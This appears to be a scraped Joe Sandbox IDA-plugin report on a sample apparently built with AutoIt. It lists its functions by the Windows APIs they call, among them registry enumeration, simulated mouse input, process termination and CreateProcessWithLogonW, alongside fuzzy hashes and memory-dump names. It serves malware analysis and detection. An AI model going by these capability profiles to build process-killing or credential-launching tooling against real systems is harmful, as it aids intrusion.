Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 06c3e0da596de7e5ebd166ea91c544cb533233ce1895cc83c049d75c6dd0b7a7
Instruction ID: 1e9d2b562339f347b1143c768e7c1a93e648469318311736b43a6f0fa2bf1ead
Opcode Fuzzy Hash: 06c3e0da596de7e5ebd166ea91c544cb533233ce1895cc83c049d75c6dd0b7a7
Instruction Fuzzy Hash: 8861793050025ADBCF01EF64CC8AAFE3BB5AF05348F04855AF9596B292DB38ED05CB91

Function 007F01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

Part of subcall function 007F0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EFDAD,?,?), ref: 007F0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F02BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F02FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007F0320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007F0349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 007F038C
RegCloseKey.ADVAPI32(00000000), ref: 007F0399

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 1ac651abe9660b4b53749232b2c70d985bb724f3d878461ab39bd37d7980826f
Instruction ID: 5944881279b63ab6f6af3b519daec7485625c81f086bcd39be0a10d02e46abcf
Opcode Fuzzy Hash: 1ac651abe9660b4b53749232b2c70d985bb724f3d878461ab39bd37d7980826f
Instruction Fuzzy Hash: 2E513C71208204EFCB14EF64C889E6EBBE5FF84314F04891DF559872A2DB39E905CB92

Function 007F5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 007F57FB
GetMenuItemCount.USER32(00000000), ref: 007F5832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007F585A
GetMenuItemID.USER32(?,?), ref: 007F58C9
GetSubMenu.USER32(?,?), ref: 007F58D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 007F5928

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 0b4d2acef38da6ffa91c7e38ac2028e05345bcf227030a115bbb93e11f8424c3
Instruction ID: 0fb316dfc78a08344e245f4c63124a5d5dd3067d23f95885b0a253436290feb7
Opcode Fuzzy Hash: 0b4d2acef38da6ffa91c7e38ac2028e05345bcf227030a115bbb93e11f8424c3
Instruction Fuzzy Hash: DE515B31A00619EFCF15EF64C845ABEB7B4EF48360F108069EA15AB351CB78AE41CB95

Function 007CEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007CEF06
VariantClear.OLEAUT32(00000013), ref: 007CEF78
VariantClear.OLEAUT32(00000000), ref: 007CEFD3
_memmove.LIBCMT ref: 007CEFFD
VariantClear.OLEAUT32(?), ref: 007CF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007CF078

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 59c307eca0e7dad9daa3a075ec68d8be8c55891f03fab93d9f558ad8734c1439
Instruction ID: 83e5fa35086e4f76ef5f3cd5f59bc864c05cd4699bc8191538fc37c28ad7daaf
Opcode Fuzzy Hash: 59c307eca0e7dad9daa3a075ec68d8be8c55891f03fab93d9f558ad8734c1439
Instruction Fuzzy Hash: 185149B5A00209EFCB14DF58C884EAABBB9FF48314B15856DED59DB301E734E951CBA0

Function 007D220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D2258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D22A3
IsMenu.USER32(00000000), ref: 007D22C3
CreatePopupMenu.USER32 ref: 007D22F7
GetMenuItemCount.USER32(000000FF), ref: 007D2355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007D2386

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 6cc0e5a177b003a33ea1ffc525ac8228c4d55f480afc5801b75f85a7bbbda008
Instruction ID: 0329dc3b6a9ec3e0cf2981afcbf1197e5273bf93026115dad1be90168b855bcd
Opcode Fuzzy Hash: 6cc0e5a177b003a33ea1ffc525ac8228c4d55f480afc5801b75f85a7bbbda008
Instruction Fuzzy Hash: 5451DF30600249EBCF21DF68C988BADBBF4BF65314F10816AE851A7392D77D9907CB51

Function 00771765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0077179A
GetWindowRect.USER32(?,?), ref: 007717FE
ScreenToClient.USER32(?,?), ref: 0077181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0077182C
EndPaint.USER32(?,?), ref: 00771876

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 33f35866cff796eab754b42901757e8180a06441ba2ed4eb32aaf110cd317aff
Instruction ID: 7e77e9e1147f1b071762fe22613c30fd51f98828a46b9756c7324ea648378141
Opcode Fuzzy Hash: 33f35866cff796eab754b42901757e8180a06441ba2ed4eb32aaf110cd317aff
Instruction Fuzzy Hash: 6B416071504700DFDB10DF29CC84BB67BE8FB46764F148669F5A8872A2CB389845DB62

Function 007FB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(008357B0,00000000,010C5DB0,?,?,008357B0,?,007FB5A8,?,?), ref: 007FB712
EnableWindow.USER32(00000000,00000000), ref: 007FB736
ShowWindow.USER32(008357B0,00000000,010C5DB0,?,?,008357B0,?,007FB5A8,?,?), ref: 007FB796
ShowWindow.USER32(00000000,00000004,?,007FB5A8,?,?), ref: 007FB7A8
EnableWindow.USER32(00000000,00000001), ref: 007FB7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 007FB7EF

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 02fc7cfd79df5b6994acbbec799fcaf2a21d8b7fac3f280019fa349281e659db
Instruction ID: 66179b2b431377d557b65c16cbc85975d0799ebf69da98aeddd29c70d79c6666
Opcode Fuzzy Hash: 02fc7cfd79df5b6994acbbec799fcaf2a21d8b7fac3f280019fa349281e659db
Instruction Fuzzy Hash: 62415434600148EFDB25EF24C499BA47BE1FF49310F5881BAEA488F762C735A856DB61

Function 007E709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,007E4E41,?,?,00000000,00000001), ref: 007E70AC

Part of subcall function 007E39A0: GetWindowRect.USER32(?,?), ref: 007E39B3

GetDesktopWindow.USER32 ref: 007E70D6
GetWindowRect.USER32(00000000), ref: 007E70DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007E710F

Part of subcall function 007D5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D52BC

GetCursorPos.USER32(?), ref: 007E713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007E7199

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 5d101cd9eca2a5ad29380fda9b3efdd78e9bba71a17d0015e738b3c0a59d16cd
Instruction ID: cb6b81708c3dcb4a1ae7b1a4f373e9bdb204511b3ceb9e9c2453d106cdacc246
Opcode Fuzzy Hash: 5d101cd9eca2a5ad29380fda9b3efdd78e9bba71a17d0015e738b3c0a59d16cd
Instruction Fuzzy Hash: 3531E472509349ABD724DF15C849F9BB7E9FFC8314F00091AF58597191CB38EA09CB96

Function 007C8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C80C0
Part of subcall function 007C80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C80CA
Part of subcall function 007C80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C80D9
Part of subcall function 007C80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C80E0
Part of subcall function 007C80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C80F6

GetLengthSid.ADVAPI32(?,00000000,007C842F), ref: 007C88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007C88D6
HeapAlloc.KERNEL32(00000000), ref: 007C88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 007C88F6
GetProcessHeap.KERNEL32(00000000,00000000,007C842F), ref: 007C890A
HeapFree.KERNEL32(00000000), ref: 007C8911

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 17e56db4776e0b598594e469cce93709049a78f990e2f5cc5755024becb2b367
Instruction ID: 5121de14478b22580c0cb617f914238f1293f3a224d46f369dbeb1bfdd594393
Opcode Fuzzy Hash: 17e56db4776e0b598594e469cce93709049a78f990e2f5cc5755024becb2b367
Instruction Fuzzy Hash: D711AC32611209FFDB509FA4DC4AFBE7BA8EF45311F10802DE89597210CB3AAD50DB66

Function 007C85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007C85E2
OpenProcessToken.ADVAPI32(00000000), ref: 007C85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007C85F8
CloseHandle.KERNEL32(00000004), ref: 007C8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007C8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 007C8646

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 38ddc9fb793634b71626174f67a79b1be7bcd3e92ef561ab06875f17e00008a3
Instruction ID: 9f3563679728d7c84b4ffd541ee1d79ce14583ba38a4267a993b940307748319
Opcode Fuzzy Hash: 38ddc9fb793634b71626174f67a79b1be7bcd3e92ef561ab06875f17e00008a3
Instruction Fuzzy Hash: FB11607250020DABDF01DF94ED49FEE7BA9EF48304F044069FD05A2161CB799D60DB65

Function 007CB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007CB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 007CB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007CB7CD
ReleaseDC.USER32(00000000,00000000), ref: 007CB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 007CB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 007CB7FE

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: c11482cb747148227cbe9ffeb25e7eef6bf838120d6db88f9074eae2387731dc
Instruction ID: 52837c3b51aa7b7840c06a2c57f6bc46b478d145ac4305526d373498147328be
Opcode Fuzzy Hash: c11482cb747148227cbe9ffeb25e7eef6bf838120d6db88f9074eae2387731dc
Instruction Fuzzy Hash: F3017175A00209BBEF109BA69C49F5EBFA8EF48711F00806AFA04A7291DA349C00CF95

Function 00790162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00790193
MapVirtualKeyW.USER32(00000010,00000000), ref: 0079019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 007901A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 007901B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 007901B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 007901C1

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 559347b3c8c01c27a8a01c52f9bf9f34be1d590f801e3e1d5a7ef6573767074a
Instruction ID: 3cb68814c8bee7ed0c9ee629c0b128b21aecb5e5c7fdbba9adacf4260968adbe
Opcode Fuzzy Hash: 559347b3c8c01c27a8a01c52f9bf9f34be1d590f801e3e1d5a7ef6573767074a
Instruction Fuzzy Hash: 6E016CB0901759BDE3008F5A8C85B52FFA8FF19354F00411BE15C87941C7F5A864CBE5

Function 007D53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007D53F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007D540F
GetWindowThreadProcessId.USER32(?,?), ref: 007D541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D5437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D543E

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: e03b91ba63b8affe3742baff92bff3e2336d2967f9d7b85ef1e10162de9ca2e2
Instruction ID: e47c65c12c6cd4d4678cbf304671da21c5fab2f0a4c3dda4cd18502c979f917a
Opcode Fuzzy Hash: e03b91ba63b8affe3742baff92bff3e2336d2967f9d7b85ef1e10162de9ca2e2
Instruction Fuzzy Hash: 3BF01D32241558BBE7215BA29C0DEFB7B7CEFC6B11F004169FA04D11519EA91A01C6B9

Function 007D7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 007D7243
EnterCriticalSection.KERNEL32(?,?,00780EE4,?,?), ref: 007D7254
TerminateThread.KERNEL32(00000000,000001F6,?,00780EE4,?,?), ref: 007D7261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00780EE4,?,?), ref: 007D726E

Part of subcall function 007D6C35: CloseHandle.KERNEL32(00000000,?,007D727B,?,00780EE4,?,?), ref: 007D6C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 007D7281
LeaveCriticalSection.KERNEL32(?,?,00780EE4,?,?), ref: 007D7288

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 360819c2a2686113f96c5dfd83a356be03ad1341ebeb1b8499e4bb2d76c5367d
Instruction ID: 93c21d821b1065c630181428e263e58b03014a2182bf8ae0c535a20c1228fcba
Opcode Fuzzy Hash: 360819c2a2686113f96c5dfd83a356be03ad1341ebeb1b8499e4bb2d76c5367d
Instruction Fuzzy Hash: B6F05E36540612EBD7151B64ED8C9EE7739FF45712B104532F503911A0DF7E6801CB64

Function 007C8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 007C899D
UnloadUserProfile.USERENV(?,?), ref: 007C89A9
CloseHandle.KERNEL32(?), ref: 007C89B2
CloseHandle.KERNEL32(?), ref: 007C89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 007C89C3
HeapFree.KERNEL32(00000000), ref: 007C89CA

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: df428b0ec7bbde894decd8bf4c80888691f5dd29303daf87bdacd909d3858fe4
Instruction ID: f0cff4565bbef61f72a5d1e9b0f846c356b8203bc9a8ef5770bab2d3ee3bd095
Opcode Fuzzy Hash: df428b0ec7bbde894decd8bf4c80888691f5dd29303daf87bdacd909d3858fe4
Instruction Fuzzy Hash: 44E05277104506FBDA012FE6EC0C96ABF69FF89762B548631F21981470CF3A9861DB68

Function 007E85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007E8613
CharUpperBuffW.USER32(?,?), ref: 007E8722
VariantClear.OLEAUT32(?), ref: 007E889A

Part of subcall function 007D7562: VariantInit.OLEAUT32(00000000), ref: 007D75A2
Part of subcall function 007D7562: VariantCopy.OLEAUT32(00000000,?), ref: 007D75AB
Part of subcall function 007D7562: VariantClear.OLEAUT32(00000000), ref: 007D75B7

Strings

AUTOIT.ERROR, xrefs: 007E8728
Incorrect Parameter format, xrefs: 007E864B, 007E880D

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 26bf5fbe36f798c6408024b4837d15fc2dcb65d387771a04340f502479f815e7
Instruction ID: aa7e375f5cbd24f5f58c9da30147cafeb3c6066ddfbc31b7df0ca6edef3c267a
Opcode Fuzzy Hash: 26bf5fbe36f798c6408024b4837d15fc2dcb65d387771a04340f502479f815e7
Instruction Fuzzy Hash: 6A91BD71605341DFCB40DF25C48496ABBE4EF89354F04892EF99A8B362DB34E905CB92

Function 007D2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0078FC86: _wcscpy.LIBCMT ref: 0078FCA9

_memset.LIBCMT ref: 007D2B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007D2BB6
